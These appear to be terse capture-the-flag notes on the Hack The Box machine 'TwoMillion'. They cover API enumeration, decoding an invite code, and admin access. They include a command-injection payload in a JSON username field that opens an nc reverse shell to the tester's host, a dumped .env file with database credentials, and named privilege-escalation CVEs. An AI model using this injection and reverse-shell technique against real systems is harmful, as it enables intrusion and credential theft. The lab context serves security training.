2M

ip: 10.10.11.221

--- Enumeration ---
-nmap_2M.nmap

function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}


makeInviteCode()
Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr : In order to generate the invite code, make a POST request to /api/v1/invite/generate


curl 'http://2million.htb/api/v1/invite/generate' \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Referer: http://2million.htb/invite' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://2million.htb' \
  -H 'DNT: 1' \
  -H 'Connection: keep-alive' \
  -H 'Cookie: PHPSESSID=lod98daaapqgadg4rsm1634hm7' \
  -H 'Content-Length: 0'

{"0":200,"success":1,"data":{"code":"Mk1LME0tS0lMQlktRk9QQkQtOUk1S0k=","format":"encoded"}}

echo 'Mk1LME0tS0lMQlktRk9QQkQtOUk1S0k=' | base64 -d : 2MK0M-KILBY-FOPBD-9I5KI

Invite Code : 2MK0M-KILBY-FOPBD-9I5KI

We log in the site !

Hack the box Dashboard 1.2.8

68/udp open|filtered dhcpc

/home 
  |-/rules
  |-/changelog
  |-/access

js/htb.back-end.js
t : ID ( machine ID or context/shout/msg ID )
e : event or data ( API token used for authentification)
i : data ( text shouted by example )

/api
  |-/v1
    |-/user
      |-/vpn
        |-/generate
        |-/regenerate
        |-/download


curl -v 'http://2million.htb/api/v1'   -H 'Referer: http://2million.htb/invite'    -H 'Origin: http://2million.htb'   -H 'Cookie: PHPSESSID=lod98daaapqgadg4rsm1634hm7'

{"v1":{"user":{"GET":{"\/api\/v1":"Route List","\/api\/v1\/invite\/how\/to\/generate":"Instructions on invite code generation","\/api\/v1\/invite\/generate":"Generate invite code","\/api\/v1\/invite\/verify":"Verify invite code","\/api\/v1\/user\/auth":"Check if user is authenticated","\/api\/v1\/user\/vpn\/generate":"Generate a new VPN configuration","\/api\/v1\/user\/vpn\/regenerate":"Regenerate VPN configuration","\/api\/v1\/user\/vpn\/download":"Download OVPN file"},"POST":{"\/api\/v1\/user\/register":"Register a new user","\/api\/v1\/user\/login":"Login with existing user"}},"admin":{"GET":{"\/api\/v1\/admin\/auth":"Check if user is admin"},"POST":{"\/api\/v1\/admin\/vpn\/generate":"Generate VPN for specific user"},"PUT":{"\/api\/v1\/admin\/settings\/update":"Update user settings"}}}}


{"id":14,"username":"nanoK","is_admin":1}


curl -v 'http://2million.htb/api/v1/admin/vpn/generate' -X 'POST' -H 'Content-Type: application/json'    -H 'Origin: http://2million.htb'   -H 'Cookie: PHPSESSID=lod98daaapqgadg4rsm1634hm7' -d '{"username": "nanoK; id; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.106 9443 >/tmp/f;"}'


www-data@2million:~/html$ cat .env 
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123


CVE-2023-0386
***pwned!
CVE-2023-4911

